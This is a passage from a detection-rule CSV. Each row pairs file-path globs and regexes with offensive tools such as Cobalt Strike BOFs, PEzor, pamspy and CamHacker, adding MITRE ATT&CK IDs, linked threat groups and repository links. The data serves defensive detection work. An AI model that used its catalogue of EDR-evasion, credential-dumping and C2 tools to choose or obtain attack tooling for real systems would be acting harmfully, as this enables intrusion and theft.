adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - 
T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/ReflectiveDll.c*",".{0,1000}\/ReflectiveDll\.c.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - 
APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/ReflectiveDLLInjection/*",".{0,1000}\/ReflectiveDLLInjection\/.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/ReflectiveLoader.c*",".{0,1000}\/ReflectiveLoader\.c.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/ReflectiveNtdll.git*",".{0,1000}\/ReflectiveNtdll\.git.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","159","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*/RefleXXion.git*",".{0,1000}\/RefleXXion\.git.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. 
NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","478","103","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*/reg_hive_sam.py*",".{0,1000}\/reg_hive_sam\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/reg_hive_security.py*",".{0,1000}\/reg_hive_security\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/reg_hive_system.py*",".{0,1000}\/reg_hive_system\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/reg_recover-rs.exe*",".{0,1000}\/reg_recover\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/reGeorg.git*",".{0,1000}\/reGeorg\.git.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. 
Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2936","814","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" "*/RegistryPersistence.c*",".{0,1000}\/RegistryPersistence\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","517","52","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*/Registry-Recon/*",".{0,1000}\/Registry\-Recon\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Registry-Recon","1","1","N/A","10","10","317","36","2022-06-06T14:39:12Z","2021-07-29T18:47:23Z" "*/reg-query.py*",".{0,1000}\/reg\-query\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/regread.lua*",".{0,1000}\/regread\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*/regreeper.jpg*",".{0,1000}\/regreeper\.jpg.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. 
RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","50","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*/Reg-Restore-Persistence-Mole*",".{0,1000}\/Reg\-Restore\-Persistence\-Mole.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","50","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*/regsvcs/meterpreter*",".{0,1000}\/regsvcs\/meterpreter.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*/regsvr.cmd*",".{0,1000}\/regsvr\.cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/regsvr32/shellcode_inject*",".{0,1000}\/regsvr32\/shellcode_inject.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*/regwrite.lua*",".{0,1000}\/regwrite\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*/regwritedel.lua*",".{0,1000}\/regwritedel\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" 
"*/releases/download/*/abc.exe*",".{0,1000}\/releases\/download\/.{0,1000}\/abc\.exe.{0,1000}","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","146","22","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" "*/releases/download/v0.1/pamspy*",".{0,1000}\/releases\/download\/v0\.1\/pamspy.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/releases/download/v0.2/pamspy*",".{0,1000}\/releases\/download\/v0\.2\/pamspy.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/releases/download/v1.0/ADFSRelay*",".{0,1000}\/releases\/download\/v1\.0\/ADFSRelay.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. 
This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","10","2","169","13","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z" "*/releases/download/v1.0/NTLMParse*",".{0,1000}\/releases\/download\/v1\.0\/NTLMParse.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","10","2","169","13","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z" "*/releases/latest/download/cloudflared-darwin-amd64.tgz*",".{0,1000}\/releases\/latest\/download\/cloudflared\-darwin\-amd64\.tgz.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/releases/latest/download/lse.sh*",".{0,1000}\/releases\/latest\/download\/lse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*/Remote/adcs_request/*",".{0,1000}\/Remote\/adcs_request\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" 
"*/Remote/office_tokens/*",".{0,1000}\/Remote\/office_tokens\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Remote/procdump/*",".{0,1000}\/Remote\/procdump\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Remote/ProcessDestroy/*",".{0,1000}\/Remote\/ProcessDestroy\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Remote/ProcessListHandles/*",".{0,1000}\/Remote\/ProcessListHandles\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Remote/schtaskscreate/*",".{0,1000}\/Remote\/schtaskscreate\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 
FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Remote/schtasksrun/*",".{0,1000}\/Remote\/schtasksrun\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 